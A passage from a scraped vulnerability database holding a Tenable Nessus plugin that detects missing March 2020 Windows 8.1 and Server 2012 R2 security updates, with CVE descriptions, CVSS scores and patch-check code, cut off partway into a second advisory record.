vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0849)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4541505: Windows 8.1 and Windows Server 2012 R2 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0797", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0814", "CVE-2020-0819", "CVE-2020-0822", "CVE-2020-0824", "CVE-2020-0830", "CVE-2020-0832", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4541509.NASL", "href": "https://www.tenable.com/plugins/nessus/134374", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134374);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0797\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0814\",\n \"CVE-2020-0819\",\n \"CVE-2020-0822\",\n \"CVE-2020-0824\",\n \"CVE-2020-0830\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4541505\");\n script_xref(name:\"MSKB\", value:\"4541509\");\n script_xref(name:\"MSFT\", value:\"MS20-4541505\");\n script_xref(name:\"MSFT\", value:\"MS20-4541509\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4541505: Windows 8.1 and Windows Server 2012 R2 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4541505\nor cumulative update 4541509. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0849)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4541505/windows-8-1-kb4541505\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4541509/windows-8-1-kb4541509\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4541505 or Cumulative Update KB4541509.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0883\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4541509', '4541505');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4541509, 4541505])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:27:55", "description": "The remote Windows host is missing security update 4540693.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An 